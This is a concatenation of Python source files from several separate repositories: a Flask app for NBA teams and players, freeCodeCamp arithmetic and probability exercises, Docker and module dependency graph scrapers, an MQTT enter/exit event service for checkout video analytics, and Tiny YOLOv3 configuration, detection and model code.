players = db.relationship('Player', backref='team', cascade='delete')
class Player(db.Model):
__tablename__ = 'players'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Text)
age = db.Column(db.Integer)
height = db.Column(db.Text)
weight = db.Column(db.Text)
position = db.Column(db.Text)
jersey_num = db.Column(db.Integer)
team_id = db.Column(db.Integer, db.ForeignKey('teams.id'))
@app.route('/')
def index():
return render_template('index.html')
@app.route('/about')
def about():
return render_template('about.html')
@app.route('/teams')
def all_teams():
teams = Team.query.all()
return render_template('all-teams.html', teams=teams)
@app.route('/players')
def all_players():
players = Player.query.all()
return render_template('all-players.html', players=players)
@app.route('/teams/edit/<int:id>', methods=['GET', 'POST'])
def teams_edit(id):
teams = Team.query.filter_by(id=id).first()
if request.method == 'GET': # show the form to update
return render_template('team-edit.html', teams=teams)
if request.method == 'POST': # this is update
teams.name = request.form['name']
teams.location = request.form['location']
teams.team_colors = request.form['team_colors']
db.session.commit()
return redirect(url_for('all_teams'))
@app.route('/players/edit/<int:id>', methods=['GET', 'POST'])
def players_edit(id):
players = Player.query.filter_by(id=id).first()
if request.method == 'GET': # show the form to update
return render_template('player-edit.html', players=players)
if request.method == 'POST': # this is update
players.name = request.form['name']
players.age = request.form['age']
players.height = request.form['height']
players.weight = request.form['weight']
players.position = request.form['position']
players.jersey_num = request.form['jersey_num']
db.session.commit()
return redirect(url_for('all_players'))
@app.route('/api/teams/<int:id>', methods=['DELETE'])
def delete_ajax_teams(id):
teams = Team.query.get_or_404(id)
db.session.delete(teams)
db.session.commit()
return jsonify({"id": str(teams.id), "name": teams.name})
@app.route('/api/players/<int:id>', methods=['DELETE'])
def delete_ajax_players(id):
players = Player.query.get_or_404(id)
db.session.delete(players)
db.session.commit()
return jsonify({"id": str(players.id), "name": players.name})
@app.route('/teams/add', methods=['GET', 'POST'])
def add_teams():
if request.method == 'GET':
return render_template('teams-add.html')
if request.method == 'POST':
# get data from the form
name = request.form['name']
location = request.form['location']
team_colors = request.form['team_colors']
# insert the data into the database
teams = Team(name=name, location=location, team_colors=team_colors)
db.session.add(teams)
db.session.commit()
return redirect(url_for('all_teams'))
@app.route('/players/add', methods=['GET', 'POST'])
def add_players():
if request.method == 'GET':
teams = Team.query.all()
return render_template('players-add.html', teams=teams)
if request.method == 'POST':
# get data from the form
name = request.form['name']
age = request.form['age']
height = request.form['height']
weight = request.form['weight']
position = request.form['position']
jersey_num = request.form['jersey_num']
team_name = request.form['team']
team = Team.query.filter_by(name=team_name).first()
# insert data into the database
players = Player(name=name, age=age, height=height, weight=weight, position=position, jersey_num=jersey_num, team=team)
db.session.add(players)
db.session.commit()
return redirect(url_for('all_players'))
if __name__ == '__main__':
app.run()
```
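Before the routes can serve anything, the SQLite schema has to exist. A minimal one-off setup sketch, run from the project root; newer Flask-SQLAlchemy releases require the application context shown here, older ones simply ignore it.
```python
# One-off schema creation for the app above.
from nba import app, db

with app.app_context():   # required on Flask-SQLAlchemy 3.x, harmless on 2.x
    db.create_all()
```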
|
{
"source": "jenmiu2/FreeCodeCamp",
"score": 4
}
|
#### File: Scientific Computing with Python Certification/Aritmetic Formatter/arithmetic_arranger.py
```python
import re
def arithmetic_arranger(problems, arranged=False):
if len(problems) < 1: return ''
if len(problems) > 5: return "Error: Too many problems."
    # check that the operator is '+' or '-' (reject '*', '/', '++', etc.)
for problem in problems:
matches = re.findall(r'(\s(\+|\-)\s(?!(\+|\-)))', problem)
if len(matches) == 0: return "Error: Operator must be '+' or '-'."
    # check that operands contain only digits
for problem in problems:
matches = re.findall(r'[a-z]', problem)
if len(matches) > 0: return "Error: Numbers must only contain digits."
for problem in problems:
matches = re.findall(r'((\b)\d{1,4})\s(\+|\-)\s(\d{1,4}(?!\d))',
problem)
if len(matches) == 0:
return "Error: Numbers cannot be more than four digits."
    # format the output strings
operand1 = "{:2}".format("")
operand2 = ""
dashes = ""
resOp = "{:1}".format("")
for i, problem in enumerate(problems):
matches = problem.split(" ")
op1str = matches[0]
op1 = int(op1str)
op2str = matches[2]
op2 = int(op2str)
operation = matches[1]
maxlenth = len(op1str) if len(op1str) >= len(op2str) else len(op2str)
# assign operand 1
operand1 += "{:>{op}}{:6}".format(op1, " ", op=maxlenth)
# assign operand 2
operand2 += "{op} {:>{lenth}}{:4}".format(op2, " ", lenth=maxlenth, op=operation)
# assign dashes
dashes += "{:-<{op}}{:4}".format("", " ", op=maxlenth + 2)
# assign result
if operation == '+':
res = op1 + op2
elif operation == '-':
res = op1 - op2
numSep = 4 if maxlenth == 3 else 3
if arranged:
resOp += "{:{lenth}}{:{sep}}".format(res, " ", sep=5, lenth=numSep)
if arranged:
arranged_problems = operand1.rstrip() + '\n' + operand2.rstrip() + '\n' + dashes.rstrip() + '\n' + resOp.rstrip()
else:
arranged_problems = operand1.rstrip() + '\n' + operand2.rstrip() + '\n' + dashes.rstrip()
return arranged_problems
```
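A quick usage sketch of the arranger; passing `True` as the second argument appends the computed results line, as in the freeCodeCamp exercise this follows.
```python
# Example calls to the arranger defined above.
from arithmetic_arranger import arithmetic_arranger

print(arithmetic_arranger(["32 + 698", "3801 - 2", "45 + 43"]))
print(arithmetic_arranger(["32 + 8", "1 - 3801"], True))
```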
#### File: Scientific Computing with Python Certification/Probability Calculator/prob_calculator.py
```python
import copy
import random
from collections import Counter
# Consider using the modules imported above.
class Hat:
def __init__(self, **kwargs):
ball = ""
for hat in kwargs.items():
ball += ((hat[0] + " ") * hat[1])
self.contents = ball.rstrip().split(" ")
def draw(self, num_balls_drawn):
if num_balls_drawn == 0:
self.contents = []
elif num_balls_drawn < len(self.contents):
reduce_contents = random.sample(self.contents, k=num_balls_drawn)
for ball in reduce_contents:
self.contents.remove(ball)
return reduce_contents
else:
return self.contents
def experiment(hat, expected_balls, num_balls_drawn, num_experiments):
probability = 0
item_expected_balls = expected_balls.items()
if num_balls_drawn > len(hat.contents):
num_balls_drawn = len(hat.contents)
for i in range(0, num_experiments):
balls_drawn = random.sample(hat.contents, num_balls_drawn)
dict_balls_drawn = dict(Counter(balls_drawn))
count = 0
for ball in item_expected_balls:
key, value = ball[0], ball[1]
if key in dict_balls_drawn and dict_balls_drawn[key] >= value:
count += 1
if len(dict_balls_drawn) == len(item_expected_balls) == count:
probability += 1
elif len(dict_balls_drawn) > len(item_expected_balls) == count:
probability += 1
return probability / num_experiments
```
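A usage sketch for the two pieces above: build a hat, then estimate the probability of drawing at least the expected balls over a number of trials. The ball counts here are arbitrary examples.
```python
# Example: probability of drawing at least 1 red and 2 green balls when
# pulling 5 balls from the hat, estimated over 2000 trials.
from prob_calculator import Hat, experiment

hat = Hat(blue=4, red=2, green=6)
probability = experiment(
    hat=hat,
    expected_balls={"red": 1, "green": 2},
    num_balls_drawn=5,
    num_experiments=2000,
)
print(round(probability, 3))
```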
|
{
"source": "jenmud/docker-graph",
"score": 3
}
|
#### File: docker-graph/docker_graph/__init__.py
```python
import argparse
import docker
import logging
import os
from ruruki_eye.server import run
from docker_graph.scrape import GRAPH
from docker_graph.scrape import scrape_image
__all__ = ["get_image_detail"]
def scrape(image=None):
"""
Inspect the image and scrape the details.
:param image: Image that you are scraping. If omitted then all images
will be scrapped.
:type image: :class:`str` or :obj:`None`
:returns: Image inspect detail.
:rtype: :class:`dict`
"""
details = []
client = docker.Client()
for detail in client.images(name=image, all=True):
scrape_image(image, detail)
details.append(detail)
return details
def parse_arguments():
"""
Parse the command line arguments.
:returns: All the command line arguments.
:rtype: :class:`argparse.Namespace`
"""
parser = argparse.ArgumentParser(
description="Docker image dependency grapher."
)
# parser.add_argument(
# "--image",
# nargs="+",
# type=scrape,
# help="Build dependency graph for given image.",
# )
parser.add_argument(
"--runserver",
action="store_true",
help="Start a ruruki http server.",
)
parser.add_argument(
"--address",
default="0.0.0.0",
help="Address to start the web server on. (default: %(default)s)",
)
parser.add_argument(
"--port",
type=int,
default=8000,
help=(
"Port number that the web server will accept connections on. "
"(default: %(default)d)"
),
)
return parser.parse_args()
def main():
"""
Entry point.
"""
logging.basicConfig(level=logging.INFO)
namespace = parse_arguments()
scrape()
if namespace.runserver is True:
run(namespace.address, namespace.port, False, GRAPH)
```
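The module can also be driven directly from Python instead of through `main()`. A sketch follows; the image name is an arbitrary example that must already exist in the local Docker daemon, and `GRAPH` is the module-level ruruki graph that `scrape_image` populates.
```python
# Hypothetical direct use of the scraper.
from docker_graph import scrape
from docker_graph.scrape import GRAPH

details = scrape("alpine:latest")
print(len(details), "image records inspected")
print(len(GRAPH.vertices), "vertices in the dependency graph")
```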
|
{
"source": "jenmud/module-dependencies",
"score": 3
}
|
#### File: module-dependencies/funnel_web/scrape.py
```python
import functools
import importlib
import inspect
import logging
import os
import pkgutil
from ruruki.graphs import Graph
from ruruki_eye.server import run
__all__ = [
"scrape",
"scrape_pkg",
"map_filename",
"map_functions",
"map_method",
"map_classes",
"map_modules",
"run_server",
"EXCLUDES"
]
GRAPH = Graph()
GRAPH.add_vertex_constraint("class", "name")
GRAPH.add_vertex_constraint("method", "name")
GRAPH.add_vertex_constraint("file", "name")
GRAPH.add_vertex_constraint("function", "name")
GRAPH.add_vertex_constraint("module", "name")
EXCLUDES = []
SEEN = set()
def _skip(name, excludes=None):
"""
Skip over names that match any of the given regex expressions.
:param name: Name that you are applying regex against.
:type name: :class:`str`
:param excludes: Regular expressions to apply against ``name``. If omitted,
then defaults will be applied.
:type excludes: Iterable of :class:`re.SRE_Pattern` or :obj:`None`
:returns: True if the ``name`` was matched by one of the regular
expressions.
:rtype: :class:`bool`
"""
if excludes is None:
excludes = EXCLUDES
for exclude in excludes:
if exclude.search(name):
logging.info(
"%r match exclude %r, skipping...",
name,
exclude.pattern
)
return True
return False
def should_skip(excludes=None):
"""
Decorate a function checking if the object name should be skipped.
This decorator expects that the first argument of the function is an
object with a ``__name__`` attribute.
:param excludes: Regular expressions to apply against ``name``. If omitted,
then defaults will be applied.
:type excludes: Iterable of :class:`re.SRE_Pattern` or :obj:`None`
"""
def decorator(func):
"""
Outer function.
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
"""
            Wrapping of the actual function you are decorating.
"""
name = args[0].__name__
if _skip(name, excludes):
return
return func(*args, **kwargs)
return wrapper
return decorator
def import_error_decorator(func):
"""
Function decorator that will catch import errors and log them.
:param func: Function that you are decorating and should take an obj
as the first parameter.
    :type func: callable
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
"""
        Wrapping of the actual function you are decorating.
"""
try:
return func(*args, **kwargs)
except ImportError:
logging.exception("Could not import %s", args[0].__name__)
return wrapper
def catch_all_errors_decorator(func):
"""
Function decorator that will catch all types of exceptions and log them.
:param func: Function that you are decorating and should take an obj
as the first parameter.
    :type func: callable
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
"""
        Wrapping of the actual function you are decorating.
"""
try:
return func(*args, **kwargs)
except Exception: # pylint: disable=broad-except
logging.exception("Hmmm something went wrong here")
return wrapper
@catch_all_errors_decorator
def map_filename(obj, parent):
"""
Find and map all the file names that the obj comes from.
:param obj: Find all files which the object comes from.
:type obj: :class:`object`
:param parent: Parent node which you are searching in.
:type parent: :class:`ruruki.interfaces.IVertex`
"""
try:
filename = inspect.getsourcefile(obj)
if filename:
node = GRAPH.get_or_create_vertex("file", name=filename)
GRAPH.get_or_create_edge(parent, "found-in", node)
logging.debug(
"(%s)-[:found-in]->(%s)",
parent.properties["name"],
filename,
)
except TypeError:
logging.debug(
"Buildin %r does not have a file, skipping",
obj.__name__
)
@import_error_decorator
def map_functions(obj, parent):
"""
Find and map all the functions recursively.
:param obj: Find all functions from the object.
:type obj: :class:`object`
:param parent: Parent node which you are searching in.
:type parent: :class:`ruruki.interfaces.IVertex`
"""
for name, obj in inspect.getmembers(obj, inspect.isfunction):
node = GRAPH.get_or_create_vertex("function", name=name)
GRAPH.get_or_create_edge(parent, "has-function", node)
map_filename(obj, node)
logging.debug(
"(%s)-[:has-function]->(%s)",
parent.properties["name"],
name,
)
@import_error_decorator
def map_method(obj, parent):
"""
Find and map all the methods recursively.
:param obj: Find all methods from the object.
:type obj: :class:`object`
:param parent: Parent node which you are searching in.
:type parent: :class:`ruruki.interfaces.IVertex`
"""
for name, obj in inspect.getmembers(obj, inspect.ismethod):
node = GRAPH.get_or_create_vertex("method", name=name)
GRAPH.get_or_create_edge(parent, "has-method", node)
logging.debug(
"(%s)-[:has-method]->(%s)",
parent.properties["name"],
name
)
@import_error_decorator
def map_classes(obj, parent):
"""
Find and map all the classes and the methods for the class recursively.
:param obj: Find all classes from the object.
:type obj: :class:`object`
:param parent: Parent node which you are searching in.
:type parent: :class:`ruruki.interfaces.IVertex`
"""
for name, obj in inspect.getmembers(obj, inspect.isclass):
node = GRAPH.get_or_create_vertex("class", name=name)
GRAPH.get_or_create_edge(parent, "has-class", node)
map_filename(obj, node)
logging.debug(
"(%s)-[:has-class]->(%s)",
parent.properties["name"],
name
)
map_method(obj, node)
for name in inspect.getmro(obj)[1:]:
sub_node = GRAPH.get_or_create_vertex(
"class",
name=name.__name__
)
GRAPH.get_or_create_edge(node, "subclasses", sub_node)
map_filename(obj, sub_node)
logging.debug(
"(%s)-[:subclasses]->(%s)",
parent.properties["name"],
name
)
map_method(name, sub_node)
@should_skip()
@import_error_decorator
def map_modules(obj, parent):
"""
Find and map all the modules recursively.
:param obj: Find all modules from the object.
:type obj: :class:`object`
:param parent: Parent node which you are searching in.
:type parent: :class:`ruruki.interfaces.IVertex`
"""
# get all the functions in the module
for _, obj in inspect.getmembers(obj, inspect.ismodule):
_id = id(obj) + id(parent)
if _id in SEEN:
continue
SEEN.add(_id)
node = GRAPH.get_or_create_vertex("module", name=obj.__name__)
node.set_property(abstract=inspect.isabstract(obj))
GRAPH.get_or_create_edge(parent, "imports", node)
map_filename(obj, node)
logging.debug(
"(%s)-[:imports]->(%s)",
parent.properties["name"],
obj.__name__
)
map_classes(obj, node)
map_functions(obj, node)
map_modules(obj, node)
@should_skip()
@catch_all_errors_decorator
@import_error_decorator
def scrape_pkg(pkg):
"""
    Scrape a package for interesting information.
    :param pkg: Package that you are scraping.
    :type pkg: :types:`ModuleType`
"""
module_dirname = os.path.dirname(inspect.getsourcefile(pkg))
pkg_node = GRAPH.get_or_create_vertex("module", name=pkg.__name__)
scrape(pkg)
for _, name, is_pkg in pkgutil.iter_modules([module_dirname]):
full_name = "{}.{}".format(pkg.__name__, name)
# because of this extra inner create, we need to add in a skip/exclude
# check here.
if _skip(full_name) or _skip(name):
continue
logging.debug("Importing %s", full_name)
module = importlib.import_module(full_name)
node = GRAPH.get_or_create_vertex("module", name=full_name)
GRAPH.get_or_create_edge(pkg_node, "contains", node)
logging.debug(
"(%s)-[:contains]->(%s)",
pkg_node.properties["name"],
node.properties["name"]
)
if is_pkg is True:
scrape_pkg(module)
scrape(module)
@should_skip()
@import_error_decorator
def scrape(module):
"""
    Scrape a module for interesting information.
    :param module: Module that you are scraping.
:type module: :types:`ModuleType`
"""
parent = GRAPH.get_or_create_vertex("module", name=module.__name__)
map_filename(module, parent)
map_modules(module, parent)
map_functions(module, parent)
def run_server(address="0.0.0.0", port=8000):
"""
    Start a web server serving up all scraped information.
:param address: Address to bind on.
:type address: :class:`str`
:param port: Port number to listen on.
:type port: :class:`int`
"""
logging.info("Vertices: %d", len(GRAPH.vertices))
logging.info("Edges: %d", len(GRAPH.edges))
logging.info("Modules: %d", len(GRAPH.get_vertices("module")))
logging.info("Classes: %d", len(GRAPH.get_vertices("class")))
logging.info("Methods: %d", len(GRAPH.get_vertices("method")))
logging.info("Function: %d", len(GRAPH.get_vertices("function")))
logging.info("Files: %d", len(GRAPH.get_vertices("file")))
run(address, port, False, GRAPH)
def dump(filename):
"""
Dump the graph to a file on disk.
.. note::
Dump will overwrite existing filenames.
    :param filename: Filename to dump the graph to.
:type filename: :class:`str`
"""
logging.info("Dumping graph to %s", filename)
with open(filename, "w") as file_handler:
GRAPH.dump(file_handler)
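# Hedged usage sketch (an assumption, not part of the original module): scrape an
# installed package into GRAPH, persist it, and serve it for browsing. "ruruki" is
# only an example target package here.
#
#     import ruruki
#     scrape_pkg(ruruki)
#     dump("ruruki-graph.json")
#     run_server(address="0.0.0.0", port=8000)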
```
|
{
"source": "jenmwms/rtsf-at-checkout-reference-design",
"score": 3
}
|
#### File: rtsf-at-checkout-cv-region-of-interest/src/enterexit.py
```python
import paho.mqtt.client as paho
import json
import time
import requests
from threading import Timer
import os
# MQTT related constants
MQTT_BROKER_HOST = "mqtt"
MQTT_BROKER_PORT = 1883
MQTT_KEEPALIVE = 60
MQTT_INCOMING_TOPIC_NAME = "AnalyticsData"
MQTT_OUTBOUND_TOPIC_NAME = "edgex"
EDGEX_DEVICE_NAME = "device-cv-roi-mqtt"
EDGEX_ROI_EVENT = "cv-roi-event"
EDGEX_ENTER_EVENT = 'ENTERED'
EDGEX_EXIT_EVENT = 'EXITED'
MQTT_BROKER_ADDRESS = MQTT_BROKER_HOST + ":" + str(MQTT_BROKER_PORT)
oldFrameDict = {}
def on_connect(client, userdata, message, rc):
print("Connected to mqtt broker")
client.subscribe(MQTT_INCOMING_TOPIC_NAME)
def on_subscribe(client, userdata, message, qos):
print("Subscribed to topic")
def on_message(client, userdata, message):
newFrameDict = {}
python_obj = json.loads(message.payload)
resolution = python_obj["resolution"]
height = resolution["height"]
width = resolution["width"]
source = python_obj["source"]
roi_name = python_obj["tags"]["roi_name"]
timestamp = python_obj["timestamp"] # timestamp is milliseconds since start of stream
# Calculate timestamp for reporting
milliSinceEPOCH = int(round(time.time() * 1000))
if 'objects' in python_obj:
# Broken down
for indv_object_detected in python_obj['objects']:
detection = indv_object_detected["detection"]
bounding_box = detection["bounding_box"]
x_max = bounding_box["x_max"]
x_min = bounding_box["x_min"]
y_max = bounding_box["y_max"]
y_min = bounding_box["y_min"]
confidence = detection["confidence"]
label = detection["label"]
label_id = detection["label_id"]
#For each frame, add the label or increment it in the dict if it is seen
if label in newFrameDict:
                newFrameDict[label] = newFrameDict[label] + 1
else:
newFrameDict[label] = 1
# Enter Exit Logic to be used when tracking is not available
# This is a simple algorithm that uses counter logic to detect enter exit events
global oldFrameDict
# Create a blank dict for comparison for brand new roi_name
if roi_name not in oldFrameDict:
oldFrameDict[roi_name] = {}
for key in newFrameDict:
# Check to see if this object type was detected in the previous frame
# and if so, what was the count
# if the count does not match up with the previous frame, report enters or exits
if key in oldFrameDict[roi_name]:
if (newFrameDict[key] > oldFrameDict[roi_name][key]):
for i in range(0, (newFrameDict[key] - oldFrameDict[roi_name][key])):
newEnterExitElement = {}
newEnterExitElement["source"] = source
newEnterExitElement["event_time"] = milliSinceEPOCH
newEnterExitElement["product_name"] = key
newEnterExitElement["roi_action"] = EDGEX_ENTER_EVENT
newEnterExitElement["roi_name"] = roi_name
mqtt_msg = wrap_edgex_event(EDGEX_DEVICE_NAME, EDGEX_ROI_EVENT, json.dumps(newEnterExitElement))
client.publish(MQTT_OUTBOUND_TOPIC_NAME, mqtt_msg)
elif (newFrameDict[key] < oldFrameDict[roi_name][key]):
for i in range(0, (oldFrameDict[roi_name][key] - newFrameDict[key])):
newEnterExitElement = {}
newEnterExitElement["source"] = source
newEnterExitElement["event_time"] = milliSinceEPOCH
newEnterExitElement["product_name"] = key
newEnterExitElement["roi_action"] = EDGEX_EXIT_EVENT
newEnterExitElement["roi_name"] = roi_name
mqtt_msg = wrap_edgex_event(EDGEX_DEVICE_NAME, EDGEX_ROI_EVENT, json.dumps(newEnterExitElement))
client.publish(MQTT_OUTBOUND_TOPIC_NAME, mqtt_msg)
del oldFrameDict[roi_name][key]
else:
# Report everything in here as new enter since it was not in the prev frame
for i in range(0, newFrameDict[key]):
newEnterExitElement = {}
newEnterExitElement["source"] = source
newEnterExitElement["event_time"] = milliSinceEPOCH
newEnterExitElement["product_name"] = key
newEnterExitElement["roi_action"] = EDGEX_ENTER_EVENT
newEnterExitElement["roi_name"] = roi_name
mqtt_msg = wrap_edgex_event(EDGEX_DEVICE_NAME, EDGEX_ROI_EVENT, json.dumps(newEnterExitElement))
client.publish(MQTT_OUTBOUND_TOPIC_NAME, mqtt_msg)
# Lastly, in case of an object type is completely removed from frame,
# iterate over the old frame for the remaining types to report them as exited
for key in oldFrameDict[roi_name]:
for i in range(0, oldFrameDict[roi_name][key]):
newEnterExitElement = {}
newEnterExitElement["source"] = source
newEnterExitElement["event_time"] = milliSinceEPOCH
newEnterExitElement["product_name"] = key
newEnterExitElement["roi_action"] = EDGEX_EXIT_EVENT
newEnterExitElement["roi_name"] = roi_name
mqtt_msg = wrap_edgex_event(EDGEX_DEVICE_NAME, EDGEX_ROI_EVENT, json.dumps(newEnterExitElement))
client.publish(MQTT_OUTBOUND_TOPIC_NAME, mqtt_msg)
#Replace the old frame data with the new frame data
oldFrameDict[roi_name] = newFrameDict.copy()
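# Illustrative walk-through of the counter logic above (not part of the original
# script; the ROI name is hypothetical):
#   previous frame for ROI "basket": {"bottle": 2}
#   current frame:                   {"bottle": 1, "apple": 1}
#   -> one EXITED event is published for "bottle", one ENTERED event for "apple",
#      and oldFrameDict["basket"] is then replaced by the current frame counts.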
def wrap_edgex_event(device_name, cmd_name, data):
edgexMQTTWrapper = {}
edgexMQTTWrapper["name"] = device_name
edgexMQTTWrapper["cmd"] = cmd_name
edgexMQTTWrapper[cmd_name] = data
return json.dumps(edgexMQTTWrapper)
def create_pipelines():
print("creating video analytics pipelines")
cameraConfiguration = []
mqttDestHost = os.environ.get('MQTT_DESTINATION_HOST')
    if mqttDestHost == None:
print("WARNING: Enter Exit Service could not create video pipeline(s), environment variable MQTT_DESTINATION_HOST not set correctly")
return
i = 0
while True:
# read env vars to find camera topic and source
# expecting env vars to be in the form CAMERA0_SRC and CAMERA0_MQTTTOPIC
camSrc = os.environ.get('CAMERA' + str(i) + '_SRC')
roiName = os.environ.get('CAMERA' + str(i) + '_ROI_NAME')
camEndpoint = os.environ.get('CAMERA'+ str(i) +'_ENDPOINT')
camCropTBLR = str(os.environ.get('CAMERA'+ str(i) +'_CROP_TBLR'))
camStreamPort = os.environ.get('CAMERA' + str(i) + '_PORT')
camCrops = dict(zip(["top", "bottom", "left", "right"], [x for x in camCropTBLR.split(",")]))
if len(camCrops) < 4:
camCrops = dict(zip(["top", "bottom", "left", "right"], [0] * 4))
if camStreamPort == None:
camStreamPort = 0
if camSrc == None or roiName == None:
break # should break out of the loop when no more CAMERA env vars are found
srcPath, srcType = ('uri', 'uri') if (('rtsp' in camSrc ) or ('file:/' in camSrc)) else ('path', 'device')
jsonConfig = {
'source': {
srcPath: camSrc,
'type': srcType
},
'destination': {
"type": "mqtt",
"host": mqttDestHost,
"topic": "AnalyticsData",
"timeout": 1000
},
'tags': {'roi_name':roiName},
'parameters' :{
"top":int(camCrops["top"]),
"left":int(camCrops["left"]),
"right":int(camCrops["right"]),
"bottom":int(camCrops["bottom"]),
"port":int(camStreamPort),
"inference_device":"CPU"
},
'camEndpoint': camEndpoint
}
cameraConfiguration.append(jsonConfig)
i += 1
if len(cameraConfiguration) < 1:
print("WARNING: Enter Exit Service could not create video pipeline(s), environment variable(s) not set correctly")
return
for camConfig in cameraConfiguration:
data = {}
data['source'] = camConfig['source']
data['destination'] = camConfig['destination']
data['tags'] = camConfig['tags']
data['parameters'] = camConfig['parameters']
jsonData = json.dumps(data)
endpoint = camConfig['camEndpoint']
print(jsonData)
headers = {'Content-type': 'application/json'}
r = requests.post(url = endpoint, data = jsonData, headers = headers)
if r.status_code == 200:
print("Created new pipeline with id: %s"%r.text)
else:
print("Error creating pipeline: %s"%r)
# TODO fix this for cam endpoints
# def delete_pipeline(instance):
# endpoint = os.environ.get('VAS_ENDPOINT')
# url = endpoint + '/' + instance
# r = requests.delete(url = url)
# print("Deleted pipeline: %s"%r.text)
wait_time = 5.0
t = Timer(wait_time, create_pipelines)
t.start()
mqttClient = paho.Client()
mqttClient.on_message = on_message
mqttClient.on_connect = on_connect
mqttClient.on_subscribe = on_subscribe
try:
mqttClient.connect(MQTT_BROKER_HOST, MQTT_BROKER_PORT, MQTT_KEEPALIVE)
mqttClient.loop_forever()
except:
print("WARNING: Enter Exit Service could not connect to mqtt broker, no enter exit messages will be produced")
```
|
{
"source": "jenn0727/Tiny_Yolo3",
"score": 3
}
|
#### File: jenn0727/Tiny_Yolo3/config.py
```python
import argparse
arg_lists = []
parser = argparse.ArgumentParser(description='tiny_yolo')
def add_argument_group(name):
arg = parser.add_argument_group(name)
arg_lists.append(arg)
return arg
def str2bool(v):
return v.lower() in ('true', '1')
def get_config():
config, unparsed = parser.parse_known_args()
return config, unparsed
# data params
data_arg = add_argument_group('Data Params')
data_arg.add_argument('--batch_size', type=int, default=1, help='# of images in each batch of data')
data_arg.add_argument('--max_batches', type=int, default=40200, help='# max_batches')
data_arg.add_argument('--class_num', type=int, default=80, help='Number of classes')
data_arg.add_argument('--steps', type=list, default=[-1,100,20000,30000], help='steps')
data_arg.add_argument('--momentum', type=float, default=0.9, help='momentum')
data_arg.add_argument('--scales', type=list, default=[.1,10,.1,.1], help='scales')
data_arg.add_argument('--decay', type=float, default=0.0005, help='decay')
# training params
train_arg = add_argument_group('Training Params')
train_arg.add_argument('--is_train', type=str2bool, default=True, help='Whether to train or test the model')
train_arg.add_argument('--epochs', type=int, default=30, help='# of epochs to train for')
train_arg.add_argument('--init_lr', type=float, default=0.001, help='Initial learning rate')
train_arg.add_argument('--train_patience', type=int, default=50, help='Number of epochs to wait before stopping train')
train_arg.add_argument("--checkpoint_interval", type=int, default=1, help="interval between saving model weights")
train_arg.add_argument(
"--checkpoint_dir", type=str, default='./ckpt/', help="directory where model checkpoints are saved"
)
train_arg.add_argument('--weightfile', type=str, default='yolov3-tiny.weights', help='path of the weight file')
train_arg.add_argument('--train_txt', type=str, default='data/train.txt', help='path of the train image')
train_arg.add_argument('--n_cpu', type=int, default=0, help='number of cpu threads to use during batch generation')
# testing params
test_arg = add_argument_group('Testing Params')
test_arg.add_argument('--anchors', type=list, default=[10, 14, 23, 27, 37, 58, 81, 82, 135, 169, 344, 319], help='the value of anchors')
test_arg.add_argument('--num_anchors', type=int, default=6, help='Number of anchors')
test_arg.add_argument('--test_txt', type=str, default='data/test.txt', help='path of the train image')
test_arg.add_argument("--iou_thres", type=float, default=0.5, help="iou threshold required to qualify as detected")
test_arg.add_argument("--conf_thres", type=float, default=0.5, help="object confidence threshold")
test_arg.add_argument("--nms_thres", type=float, default=0.45, help="iou thresshold for non-maximum suppression")
# other params
other_arg = add_argument_group('Other Params')
other_arg.add_argument('--use_gpu', type=str2bool, default=False, help='Whether to run on GPU')
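# Minimal self-test sketch (an assumption, not part of the original file): print the
# parsed defaults when this module is run directly; importing it elsewhere is unaffected.
if __name__ == '__main__':
    cfg, unparsed_args = get_config()
    print(cfg)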
```
#### File: jenn0727/Tiny_Yolo3/detect.py
```python
from util import *
from tiny_yolo import tiny_yolo
#from SE_yolo import SE_yolo
from config import get_config
from trainer import Trainer
from util import prepare_dirs
def detect(config, weightfile, imgfile):
m = tiny_yolo(config)
#m.print_network()
m.load_weights(weightfile)
print('Loading weights from %s... Done!' % (weightfile))
num_classes = config.class_num
namesfile = 'data/coco.names'
'''
num_classes = 80
if num_classes == 20:
namesfile = ''
elif num_classes == 80:
namesfile = 'data/coco.names'
else:
namesfile = 'data/names'
'''
cuda = torch.cuda.is_available() and config.use_gpu
if cuda:
m.cuda()
img = Image.open(imgfile).convert('RGB')
sized = img.resize((416, 416))
start = time.time()
boxes = do_detect(m, sized, 0.5, 0.5, cuda)
print(boxes)
finish = time.time()
print('%s: Predicted in %f seconds.' % (imgfile, (finish-start)))
class_names = load_class_names(namesfile)
plot_boxes(img, boxes, 'prediction.jpg', class_names)
def main(config):
prepare_dirs(config)
trainer = Trainer(config)
if config.is_train:
trainer.train()
else:
# load a pre-trained model and test
trainer.test()
if __name__ == '__main__':
config, unparsed = get_config()
main(config)
'''
weightfile = 'yolov3-tiny.weights'
imgfile = 'data/13.jpg'
detect(config, weightfile, imgfile)
if len(sys.argv) == 3:
weightfile = sys.argv[1]
imgfile = sys.argv[2]
detect(weightfile, imgfile)
else:
print('Usage: ')
print(' python detect.py cfgfile weightfile imgfile')
'''
```
#### File: jenn0727/Tiny_Yolo3/tiny_yolo.py
```python
import torch
import torch.nn as nn
from yolo_layer import YoloLayer
from util import *
import torch.nn.functional as F
from collections import OrderedDict
from collections import defaultdict
class EmptyModule(nn.Module):
def __init__(self):
super(EmptyModule, self).__init__()
def forward(self, x):
return x
class MaxPoolStride1(nn.Module):
def __init__(self):
super(MaxPoolStride1, self).__init__()
def forward(self, x):
x = F.max_pool2d(F.pad(x, (0,1,0,1), mode='replicate'), 2, stride=1)
return x
class tiny_yolo(nn.Module):
def __init__(self, config):
super(tiny_yolo, self).__init__()
self.config = config
self.loss_names = ["x", "y", "w", "h", "conf", "cls", "recall", "precision"]
self.seen = 0
self.header_info = np.array([0, 0, 0, self.seen, 0])
self.conv_bn = [0, 4, 8, 12, 16, 20, 24, 27, 30, 36, 41]
self.conv = [33,44]
self.cnn = nn.Sequential(OrderedDict([
# 0 conv 0-2
('conv0', nn.Conv2d(3, 16, 3, 1, 1, bias=False)),
('bn0', nn.BatchNorm2d(16)),
('leaky0', nn.LeakyReLU(0.1, inplace=True)),
# 1 max 3
('max1', nn.MaxPool2d(2, 2)),
# 2 conv 4-6
('conv2', nn.Conv2d(16, 32, 3, 1, 1, bias=False)),
('bn2', nn.BatchNorm2d(32)),
('leaky2', nn.LeakyReLU(0.1, inplace=True)),
# 3 max 7
('pool3', nn.MaxPool2d(2, 2)),
# 4 conv 8-10
('conv4', nn.Conv2d(32, 64, 3, 1, 1, bias=False)),
('bn4', nn.BatchNorm2d(64)),
